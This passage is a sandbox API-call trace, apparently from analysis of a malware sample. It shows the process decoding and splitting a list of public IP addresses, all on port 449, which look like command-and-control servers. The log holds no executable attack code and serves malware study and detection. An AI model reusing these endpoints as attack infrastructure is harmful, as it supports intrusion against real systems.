	[0102.282] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x245250, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 18
	[0102.282] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x1ec5a8
	[0102.282] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x245250, cbMultiByte=-1, lpWideCharStr=0x1ec5a8, cchWideChar=18 | out: lpWideCharStr="181.143.17.66:449") returned 18
	[0102.282] StrStrIW (lpFirst="181.143.17.66:449", lpSrch=":") returned=":449"
	[0102.283] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248940
	[0102.283] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2456d8
	[0102.283] lstrcpynW (in: lpString1=0x2456d8, lpString2="181.143.17.66:449", iMaxLength=14 | out: lpString1="181.143.17.66") returned="181.143.17.66"
	[0102.283] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0
	[0102.283] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x248940, Size=0x10) returned 0x248928
	[0102.283] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248940
	[0102.283] lstrcpynW (in: lpString1=0x248940, lpString2="449", iMaxLength=4 | out: lpString1="449") returned="449"
	[0102.283] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x24bb28
	[0102.283] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248940) returned 1
	[0102.283] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2456d8) returned 1
	[0102.283] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248928) returned 1
	[0102.283] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x1ec5a8) returned 1
	[0102.283] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x245278, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 17
	[0102.283] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x1ec5a8
	[0102.283] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x245278, cbMultiByte=-1, lpWideCharStr=0x1ec5a8, cchWideChar=17 | out: lpWideCharStr="186.43.33.81:449") returned 17
	[0102.283] StrStrIW (lpFirst="186.43.33.81:449", lpSrch=":") returned=":449"
	[0102.283] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248928
	[0102.283] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2456d8
	[0102.283] lstrcpynW (in: lpString1=0x2456d8, lpString2="186.43.33.81:449", iMaxLength=13 | out: lpString1="186.43.33.81") returned="186.43.33.81"
	[0102.283] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0
	[0102.283] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x248928, Size=0x10) returned 0x248940
	[0102.283] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248928
	[0102.283] lstrcpynW (in: lpString1=0x248928, lpString2="449", iMaxLength=4 | out: lpString1="449") returned="449"
	[0102.283] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x24bb50
	[0102.283] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248928) returned 1
	[0102.283] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2456d8) returned 1
	[0102.283] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248940) returned 1
	[0102.283] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x1ec5a8) returned 1
	[0102.283] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2452a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 19
	[0102.283] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x1ec5a8
	[0102.283] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2452a0, cbMultiByte=-1, lpWideCharStr=0x1ec5a8, cchWideChar=19 | out: lpWideCharStr="181.143.102.30:449") returned 19
	[0102.283] StrStrIW (lpFirst="181.143.102.30:449", lpSrch=":") returned=":449"
	[0102.284] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248940
	[0102.284] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2456d8
	[0102.284] lstrcpynW (in: lpString1=0x2456d8, lpString2="181.143.102.30:449", iMaxLength=15 | out: lpString1="181.143.102.30") returned="181.143.102.30"
	[0102.284] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0
	[0102.284] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x248940, Size=0x10) returned 0x248928
	[0102.284] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248940
	[0102.284] lstrcpynW (in: lpString1=0x248940, lpString2="449", iMaxLength=4 | out: lpString1="449") returned="449"
	[0102.284] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x24bb78
	[0102.284] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248940) returned 1
	[0102.284] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2456d8) returned 1
	[0102.284] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248928) returned 1
	[0102.284] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x1ec5a8) returned 1
	[0102.284] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2452c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 17
	[0102.284] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x1ec5a8
	[0102.284] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2452c8, cbMultiByte=-1, lpWideCharStr=0x1ec5a8, cchWideChar=17 | out: lpWideCharStr="190.0.20.114:449") returned 17
	[0102.284] StrStrIW (lpFirst="190.0.20.114:449", lpSrch=":") returned=":449"
	[0102.284] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248928
	[0102.284] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2456d8
	[0102.284] lstrcpynW (in: lpString1=0x2456d8, lpString2="190.0.20.114:449", iMaxLength=13 | out: lpString1="190.0.20.114") returned="190.0.20.114"
	[0102.284] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0
	[0102.284] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x248928, Size=0x10) returned 0x248940
	[0102.284] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248928
	[0102.284] lstrcpynW (in: lpString1=0x248928, lpString2="449", iMaxLength=4 | out: lpString1="449") returned="449"
	[0102.284] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x24bba0
	[0102.284] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248928) returned 1
	[0102.284] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2456d8) returned 1
	[0102.285] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248940) returned 1
	[0102.285] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x1ec5a8) returned 1
	[0102.285] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2452f0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 19
	[0102.285] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x1ec5a8
	[0102.285] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2452f0, cbMultiByte=-1, lpWideCharStr=0x1ec5a8, cchWideChar=19 | out: lpWideCharStr="190.151.25.178:449") returned 19
	[0102.285] StrStrIW (lpFirst="190.151.25.178:449", lpSrch=":") returned=":449"
	[0102.285] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248940
	[0102.285] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2456d8
	[0102.285] lstrcpynW (in: lpString1=0x2456d8, lpString2="190.151.25.178:449", iMaxLength=15 | out: lpString1="190.151.25.178") returned="190.151.25.178"
	[0102.285] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0
	[0102.285] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x248940, Size=0x10) returned 0x248928
	[0102.285] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248940
	[0102.285] lstrcpynW (in: lpString1=0x248940, lpString2="449", iMaxLength=4 | out: lpString1="449") returned="449"
	[0102.285] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x24bbc8
	[0102.285] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248940) returned 1
	[0102.285] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2456d8) returned 1
	[0102.285] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248928) returned 1
	[0102.285] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x1ec5a8) returned 1
	[0102.285] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x245318, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 18
	[0102.285] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x1ec5a8
	[0102.285] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x245318, cbMultiByte=-1, lpWideCharStr=0x1ec5a8, cchWideChar=18 | out: lpWideCharStr="201.184.69.50:449") returned 18
	[0102.285] StrStrIW (lpFirst="201.184.69.50:449", lpSrch=":") returned=":449"
	[0102.285] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248928
	[0102.285] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2456d8
	[0102.286] lstrcpynW (in: lpString1=0x2456d8, lpString2="201.184.69.50:449", iMaxLength=14 | out: lpString1="201.184.69.50") returned="201.184.69.50"
	[0102.286] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0
	[0102.286] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x248928, Size=0x10) returned 0x248940
	[0102.286] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248928
	[0102.286] lstrcpynW (in: lpString1=0x248928, lpString2="449", iMaxLength=4 | out: lpString1="449") returned="449"
	[0102.286] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x24bbf0
	[0102.286] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248928) returned 1
	[0102.286] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2456d8) returned 1
	[0102.286] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248940) returned 1
	[0102.286] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x1ec5a8) returned 1
	[0102.286] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x245340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 20
	[0102.286] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x1ec5a8
	[0102.286] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x245340, cbMultiByte=-1, lpWideCharStr=0x1ec5a8, cchWideChar=20 | out: lpWideCharStr="190.109.165.197:449") returned 20
	[0102.286] StrStrIW (lpFirst="190.109.165.197:449", lpSrch=":") returned=":449"
	[0102.286] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248940
	[0102.286] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2456d8
	[0102.286] lstrcpynW (in: lpString1=0x2456d8, lpString2="190.109.165.197:449", iMaxLength=16 | out: lpString1="190.109.165.197") returned="190.109.165.197"
	[0102.286] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0
	[0102.286] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x248940, Size=0x10) returned 0x248928
	[0102.286] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248940
	[0102.286] lstrcpynW (in: lpString1=0x248940, lpString2="449", iMaxLength=4 | out: lpString1="449") returned="449"
	[0102.286] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x24bc18
	[0102.286] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248940) returned 1
	[0102.286] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2456d8) returned 1
	[0102.286] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248928) returned 1
	[0102.286] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x1ec5a8) returned 1
	[0102.286] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x245368, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 19
	[0102.286] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x1ec5a8
	[0102.286] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x245368, cbMultiByte=-1, lpWideCharStr=0x1ec5a8, cchWideChar=19 | out: lpWideCharStr="125.209.82.158:449") returned 19
	[0102.286] StrStrIW (lpFirst="125.209.82.158:449", lpSrch=":") returned=":449"
	[0102.287] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248928
	[0102.287] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2456d8
	[0102.287] lstrcpynW (in: lpString1=0x2456d8, lpString2="125.209.82.158:449", iMaxLength=15 | out: lpString1="125.209.82.158") returned="125.209.82.158"
	[0102.287] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0
	[0102.287] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x248928, Size=0x10) returned 0x248940
	[0102.287] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248928
	[0102.287] lstrcpynW (in: lpString1=0x248928, lpString2="449", iMaxLength=4 | out: lpString1="449") returned="449"
	[0102.287] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x24bc40
	[0102.287] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248928) returned 1
	[0102.287] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2456d8) returned 1
	[0102.287] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248940) returned 1
	[0102.287] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x1ec5a8) returned 1
	[0102.287] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x245390, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 18
	[0102.287] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x1ec5a8
	[0102.287] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x245390, cbMultiByte=-1, lpWideCharStr=0x1ec5a8, cchWideChar=18 | out: lpWideCharStr="80.173.224.81:449") returned 18
	[0102.287] StrStrIW (lpFirst="80.173.224.81:449", lpSrch=":") returned=":449"
	[0102.287] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248940
	[0102.287] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2456d8
	[0102.287] lstrcpynW (in: lpString1=0x2456d8, lpString2="80.173.224.81:449", iMaxLength=14 | out: lpString1="80.173.224.81") returned="80.173.224.81"
	[0102.287] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0
	[0102.287] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x248940, Size=0x10) returned 0x248928
	[0102.287] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248940
	[0102.287] lstrcpynW (in: lpString1=0x248940, lpString2="449", iMaxLength=4 | out: lpString1="449") returned="449"
	[0102.287] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x24bc68
	[0102.287] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248940) returned 1
	[0102.288] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2456d8) returned 1
	[0102.288] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248928) returned 1
	[0102.288] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x1ec5a8) returned 1
	[0102.288] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2453b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 18
	[0102.288] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x1ec5a8
	[0102.288] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2453b8, cbMultiByte=-1, lpWideCharStr=0x1ec5a8, cchWideChar=18 | out: lpWideCharStr="76.107.90.235:449") returned 18
	[0102.288] StrStrIW (lpFirst="76.107.90.235:449", lpSrch=":") returned=":449"
	[0102.288] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248928
	[0102.288] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2456d8
	[0102.288] lstrcpynW (in: lpString1=0x2456d8, lpString2="76.107.90.235:449", iMaxLength=14 | out: lpString1="76.107.90.235") returned="76.107.90.235"
	[0102.288] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0
	[0102.288] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x248928, Size=0x10) returned 0x248940
	[0102.288] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248928
	[0102.288] lstrcpynW (in: lpString1=0x248928, lpString2="449", iMaxLength=4 | out: lpString1="449") returned="449"
	[0102.288] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x24bc90
	[0102.288] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248928) returned 1
	[0102.288] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2456d8) returned 1
	[0102.288] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248940) returned 1
	[0102.288] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x1ec5a8) returned 1
	[0102.288] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2453e0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 20
	[0102.288] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x1ec5a8
	[0102.288] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2453e0, cbMultiByte=-1, lpWideCharStr=0x1ec5a8, cchWideChar=20 | out: lpWideCharStr="181.129.136.226:449") returned 20
	[0102.288] StrStrIW (lpFirst="181.129.136.226:449", lpSrch=":") returned=":449"
	[0102.288] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248940
	[0102.288] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2456d8
	[0102.289] lstrcpynW (in: lpString1=0x2456d8, lpString2="181.129.136.226:449", iMaxLength=16 | out: lpString1="181.129.136.226") returned="181.129.136.226"
	[0102.289] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0
	[0102.289] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x248940, Size=0x10) returned 0x248928
	[0102.289] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248940
	[0102.289] lstrcpynW (in: lpString1=0x248940, lpString2="449", iMaxLength=4 | out: lpString1="449") returned="449"
	[0102.289] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x24bcb8
	[0102.289] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248940) returned 1
	[0102.289] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2456d8) returned 1
	[0102.289] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248928) returned 1
	[0102.289] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x1ec5a8) returned 1
	[0102.289] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x245408, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 20
	[0102.289] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x1ec5a8
	[0102.289] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x245408, cbMultiByte=-1, lpWideCharStr=0x1ec5a8, cchWideChar=20 | out: lpWideCharStr="191.103.219.138:449") returned 20
	[0102.289] StrStrIW (lpFirst="191.103.219.138:449", lpSrch=":") returned=":449"
	[0102.289] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248928
	[0102.289] lstrcpynW (in: lpString1=0x2456d8, lpString2="191.103.219.138:449", iMaxLength=16 | out: lpString1="191.103.219.138") returned="191.103.219.138"
	[0102.289] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0
	[0102.289] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x248928, Size=0x10) returned 0x248940
	[0102.289] lstrcpynW (in: lpString1=0x248928, lpString2="449", iMaxLength=4 | out: lpString1="449") returned="449"
	[0102.289] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x245430, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 18
	[0102.289] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x245430, cbMultiByte=-1, lpWideCharStr=0x1ec5a8, cchWideChar=18 | out: lpWideCharStr="202.63.242.48:449") returned 18
	[0102.289] StrStrIW (lpFirst="202.63.242.48:449", lpSrch=":") returned=":449"
	[0102.290] lstrcpynW (in: lpString1=0x2456d8, lpString2="202.63.242.48:449", iMaxLength=14 | out: lpString1="202.63.242.48") returned="202.63.242.48"
	[0102.290] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0
	[0102.290] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x248940, Size=0x10) returned 0x248928
	[0102.290] lstrcpynW (in: lpString1=0x248940, lpString2="449", iMaxLength=4 | out: lpString1="449") returned="449"
	[0102.290] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x245458, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 18
	[0102.290] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x245458, cbMultiByte=-1, lpWideCharStr=0x1ec5a8, cchWideChar=18 | out: lpWideCharStr="181.176.191.5:449") returned 18
	[0102.290] StrStrIW (lpFirst="181.176.191.5:449", lpSrch=":") returned=":449"
	[0102.290] lstrcpynW (in: lpString1=0x2456d8, lpString2="181.176.191.5:449", iMaxLength=14 | out: lpString1="181.176.191.5") returned="181.176.191.5"
	[0102.290] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0
	[0102.290] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x248928, Size=0x10) returned 0x248940
	[0102.290] lstrcpynW (in: lpString1=0x248928, lpString2="449", iMaxLength=4 | out: lpString1="449") returned="449"
	[0102.290] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x245480, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 19
	[0102.291] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x245480, cbMultiByte=-1, lpWideCharStr=0x1ec5a8, cchWideChar=19 | out: lpWideCharStr="190.117.66.194:449") returned 19
	[0102.291] StrStrIW (lpFirst="190.117.66.194:449", lpSrch=":") returned=":449"
	[0102.291] lstrcpynW (in: lpString1=0x2456d8, lpString2="190.117.66.194:449", iMaxLength=15 | out: lpString1="190.117.66.194") returned="190.117.66.194"
	[0102.291] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0
	[0102.291] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x248940, Size=0x10) returned 0x248928
	[0102.291] lstrcpynW (in: lpString1=0x248940, lpString2="449", iMaxLength=4 | out: lpString1="449") returned="449"
	[0102.291] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2454a8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 20
	[0102.291] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2454a8, cbMultiByte=-1, lpWideCharStr=0x1ec5a8, cchWideChar=20 | out: lpWideCharStr="186.226.188.105:449") returned 20
	[0102.291] StrStrIW (lpFirst="186.226.188.105:449", lpSrch=":") returned=":449"
	[0102.291] lstrcpynW (in: lpString1=0x2456d8, lpString2="186.226.188.105:449", iMaxLength=16 | out: lpString1="186.226.188.105") returned="186.226.188.105"
	[0102.291] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0
	[0102.291] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x248928, Size=0x10) returned 0x248940
	[0102.291] lstrcpynW (in: lpString1=0x248928, lpString2="449", iMaxLength=4 | out: lpString1="449") returned="449"
	[0102.291] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2454d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 18
	[0102.292] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2454d0, cbMultiByte=-1, lpWideCharStr=0x1ec5a8, cchWideChar=18 | out: lpWideCharStr="186.159.1.217:449") returned 18
	[0102.292] StrStrIW (lpFirst="186.159.1.217:449", lpSrch=":") returned=":449"
	[0102.292] lstrcpynW (in: lpString1=0x2456d8, lpString2="186.159.1.217:449", iMaxLength=14 | out: lpString1="186.159.1.217") returned="186.159.1.217"
	[0102.292] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0
	[0102.292] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x248940, Size=0x10) returned 0x248928
	[0102.292] lstrcpynW (in: lpString1=0x248940, lpString2="449", iMaxLength=4 | out: lpString1="449") returned="449"
	[0102.292] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2454f8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 19
	[0102.292] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2454f8, cbMultiByte=-1, lpWideCharStr=0x1ec5a8, cchWideChar=19 | out: lpWideCharStr="190.151.10.114:449") returned 19
	[0102.292] StrStrIW (lpFirst="190.151.10.114:449", lpSrch=":") returned=":449"
	[0102.292] lstrcpynW (in: lpString1=0x2456d8, lpString2="190.151.10.114:449", iMaxLength=15 | out: lpString1="190.151.10.114") returned="190.151.10.114"
	[0102.292] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0
